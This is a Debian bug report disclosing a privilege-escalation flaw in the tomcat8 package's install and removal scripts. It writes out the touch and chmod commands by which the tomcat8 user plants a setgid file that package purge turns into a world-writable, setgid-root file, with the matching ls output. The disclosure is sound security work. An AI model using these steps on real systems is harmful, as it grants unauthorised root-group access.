Package: tomcat8 Version: 8.0.14-1+deb8u4 Severity: critical Tags: security
Having installed tomcat8, the directory /etc/tomcat8/Catalina is set writable by group tomcat8, as per the postinst script. Then the tomcat8 user, in the situation envisaged in DSA-3670 and DSA-3720, see also http://seclists.org/fulldisclosure/2016/Oct/4 could use something like commands touch /etc/tomcat8/Catalina/attack chmod 2747 /etc/tomcat8/Catalina/attack to create a file: # ls -l /etc/tomcat8/Catalina/attack -rwxr-Srwx 1 tomcat8 tomcat8 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack Then if the tomcat8 package is removed (purged?), the postrm script runs chown -Rhf root:root /etc/tomcat8/ and that will leave the file world-writable, setgid root: # ls -l /etc/tomcat8/Catalina/attack -rwxr-Srwx 1 root root 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack allowing "group root" access to the world. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia
